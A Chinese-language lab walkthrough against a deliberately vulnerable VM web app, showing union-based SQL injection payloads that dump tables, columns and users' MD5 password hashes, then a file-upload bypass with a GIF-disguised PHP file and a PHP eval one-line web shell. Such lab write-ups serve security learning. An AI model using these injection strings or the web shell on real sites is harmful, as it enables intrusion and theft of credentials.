这是一个vm靶场文件,文件包含漏洞
不必说vm安装靶场
出现此界面即可以访问了
首先,
查看在虚拟网络编辑器中查看靶机虚拟网卡网段
然后对端口进行爆破并访问,端口扫80
总之先建个账号看看
ps:123456
直接点查找
可以查到所有书名,然后漏洞挨个试一试
输入一个书名+sql注入的语法
IoT Exploitation' and 1=1 -- -
发现存在sql注入
order by判断3回显4不回显
' union select 1,2,3-- -
联合查询判断回显
sql内置库查询一套
库名webapphacking
表名
' union select group_concat(table_name),database(),3 from information_schema.tables where table_schema='webapphacking'-- -
books,users
显然,我们要用users这个看看列
' union select group_concat(column_name),database(),3 from information_schema.columns where table_schema='webapphacking' and table_name='users'-- -
id,user,pasword,name,address
看看user和pasword
' union select group_concat(0x7e,user,0x7e,pasword,0x7e),database(),3 from users-- -
~user1~5d41402abc4b2a76b9719d911017c592~,~user2~6269c4f71a55b24bad0f0267d9be5508~,~user3~0f359740bd1cda994f8b55330c86d845~,~test~05a671c66aefea124cc08b76ea6d30bb~,~superadmin~2386acb2cf356944177746fc92523983~,~test1~05a671c66aefea124cc08b76ea6d30bb~,~123456~e10adc3949ba59abbe56e057f20f883e~在这些数据里显然superadmin十分显眼,我们登录一下看一看,后面的扔到md5解码一下,一般来说密码都是这个加密的
登陆一下振奋人心的消息,页面不一样了,想想我们应该怎么做
我根据提示上传了一个1.jpg,这个图片是我之前做的错误图片
去他说的uploads folder看一看,这个功能是正常的
然后传一个正常图片,也能显示
这次我们传一个带php的图片,具体怎么传,看看upload-labs靶场的教学
GIF89a<?php phpinfo();?>,这是一个伪装成gif的php文件,把他传上去看一看
显然,这种方式是可以的
我们来一个php一句话木马<?php @eval($_POST['hackme']);?>
然后小编在这里怎么也链接不成功,就先到这里吧,以后再说